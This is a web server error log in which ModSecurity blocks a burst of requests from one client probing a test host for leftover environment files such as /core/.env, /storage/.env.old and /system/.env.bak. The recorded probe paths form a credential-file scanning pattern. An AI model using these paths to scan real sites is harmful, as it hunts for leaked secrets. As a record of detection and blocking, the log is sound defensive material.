[Tue Nov 18 14:51:54.692460 2025] [:error] [pid 160237] [client 34.235.129.146:33170] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aRx5-k0XkfZCrdQo7dFhXQAAAAM"]
[Tue Nov 18 14:51:54.698128 2025] [:error] [pid 160906] [client 34.235.129.146:33110] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aRx5-v7FUeIdxVPAs5igvwAAAAY"]
[Tue Nov 18 14:51:54.698286 2025] [:error] [pid 160906] [client 34.235.129.146:33110] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aRx5-v7FUeIdxVPAs5igvwAAAAY"]
[Tue Nov 18 14:51:54.698466 2025] [:error] [pid 160906] [client 34.235.129.146:33110] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aRx5-v7FUeIdxVPAs5igvwAAAAY"]
[Tue Nov 18 14:51:54.700405 2025] [:error] [pid 160239] [client 34.235.129.146:33278] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aRx5-u1NcONF8naoxQFe-wAAAAw"]
[Tue Nov 18 14:51:54.700555 2025] [:error] [pid 160239] [client 34.235.129.146:33278] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aRx5-u1NcONF8naoxQFe-wAAAAw"]
[Tue Nov 18 14:51:54.700702 2025] [:error] [pid 160239] [client 34.235.129.146:33278] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aRx5-u1NcONF8naoxQFe-wAAAAw"]
[Tue Nov 18 14:51:54.815013 2025] [:error] [pid 160901] [client 34.235.129.146:33178] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aRx5-h54imVYfbO8_klVWQAAAAU"]
[Tue Nov 18 14:51:54.815168 2025] [:error] [pid 160901] [client 34.235.129.146:33178] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aRx5-h54imVYfbO8_klVWQAAAAU"]
[Tue Nov 18 14:51:54.815434 2025] [:error] [pid 160901] [client 34.235.129.146:33178] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aRx5-h54imVYfbO8_klVWQAAAAU"]
[Tue Nov 18 14:51:54.815597 2025] [:error] [pid 160901] [client 34.235.129.146:33178] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aRx5-h54imVYfbO8_klVWQAAAAU"]
[Tue Nov 18 14:51:54.820775 2025] [:error] [pid 154301] [client 34.235.129.146:33268] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aRx5-u18X441rUDF_U5eTAAAAAg"]
[Tue Nov 18 14:51:54.820923 2025] [:error] [pid 154301] [client 34.235.129.146:33268] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aRx5-u18X441rUDF_U5eTAAAAAg"]
[Tue Nov 18 14:51:54.821093 2025] [:error] [pid 154301] [client 34.235.129.146:33268] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aRx5-u18X441rUDF_U5eTAAAAAg"]
[Tue Nov 18 14:51:54.821236 2025] [:error] [pid 154301] [client 34.235.129.146:33268] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aRx5-u18X441rUDF_U5eTAAAAAg"]
[Tue Nov 18 14:51:54.836265 2025] [:error] [pid 160877] [client 34.235.129.146:33220] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aRx5-ggYjeY2f7-QfdJurQAAAAI"]
[Tue Nov 18 14:51:54.836454 2025] [:error] [pid 160877] [client 34.235.129.146:33220] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aRx5-ggYjeY2f7-QfdJurQAAAAI"]
[Tue Nov 18 14:51:54.836602 2025] [:error] [pid 160877] [client 34.235.129.146:33220] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aRx5-ggYjeY2f7-QfdJurQAAAAI"]
[Tue Nov 18 14:51:54.905428 2025] [:error] [pid 160881] [client 34.235.129.146:33212] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aRx5-sKvHpCFfzvQgqZezgAAAAQ"]
[Tue Nov 18 14:51:54.905618 2025] [:error] [pid 160881] [client 34.235.129.146:33212] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aRx5-sKvHpCFfzvQgqZezgAAAAQ"]
[Tue Nov 18 14:51:54.905766 2025] [:error] [pid 160881] [client 34.235.129.146:33212] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aRx5-sKvHpCFfzvQgqZezgAAAAQ"]
[Tue Nov 18 14:51:54.915009 2025] [:error] [pid 163656] [client 34.235.129.146:33238] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.bak"] [unique_id "aRx5-sCoCYNOyUBImXwJMQAAAAc"]
[Tue Nov 18 14:51:54.915162 2025] [:error] [pid 163656] [client 34.235.129.146:33238] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.bak"] [unique_id "aRx5-sCoCYNOyUBImXwJMQAAAAc"]
[Tue Nov 18 14:51:54.915329 2025] [:error] [pid 163656] [client 34.235.129.146:33238] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.bak"] [unique_id "aRx5-sCoCYNOyUBImXwJMQAAAAc"]
[Tue Nov 18 14:51:54.915499 2025] [:error] [pid 163656] [client 34.235.129.146:33238] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env.bak"] [unique_id "aRx5-sCoCYNOyUBImXwJMQAAAAc"]
[Tue Nov 18 14:51:54.941085 2025] [:error] [pid 160239] [client 34.235.129.146:33088] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRx5-u1NcONF8naoxQFe_AAAAAw"]
[Tue Nov 18 14:51:54.941244 2025] [:error] [pid 160239] [client 34.235.129.146:33088] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRx5-u1NcONF8naoxQFe_AAAAAw"]
[Tue Nov 18 14:51:54.941397 2025] [:error] [pid 160239] [client 34.235.129.146:33088] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRx5-u1NcONF8naoxQFe_AAAAAw"]
[Tue Nov 18 14:51:54.943032 2025] [:error] [pid 160906] [client 34.235.129.146:33132] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aRx5-v7FUeIdxVPAs5igwAAAAAY"]
[Tue Nov 18 14:51:54.943172 2025] [:error] [pid 160906] [client 34.235.129.146:33132] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aRx5-v7FUeIdxVPAs5igwAAAAAY"]
[Tue Nov 18 14:51:54.943309 2025] [:error] [pid 160906] [client 34.235.129.146:33132] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aRx5-v7FUeIdxVPAs5igwAAAAAY"]
[Tue Nov 18 14:51:54.951307 2025] [:error] [pid 160237] [client 34.235.129.146:33282] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.bak"] [unique_id "aRx5-k0XkfZCrdQo7dFhXgAAAAM"]
[Tue Nov 18 14:51:54.951449 2025] [:error] [pid 160237] [client 34.235.129.146:33282] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.bak"] [unique_id "aRx5-k0XkfZCrdQo7dFhXgAAAAM"]
[Tue Nov 18 14:51:54.951592 2025] [:error] [pid 160237] [client 34.235.129.146:33282] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.bak"] [unique_id "aRx5-k0XkfZCrdQo7dFhXgAAAAM"]
[Tue Nov 18 14:51:54.951728 2025] [:error] [pid 160237] [client 34.235.129.146:33282] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env.bak"] [unique_id "aRx5-k0XkfZCrdQo7dFhXgAAAAM"]
[Tue Nov 18 14:51:54.966969 2025] [:error] [pid 153863] [client 34.235.129.146:33108] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.bak"] [unique_id "aRx5-uo53hvRBsk5IfbhXgAAAAA"]
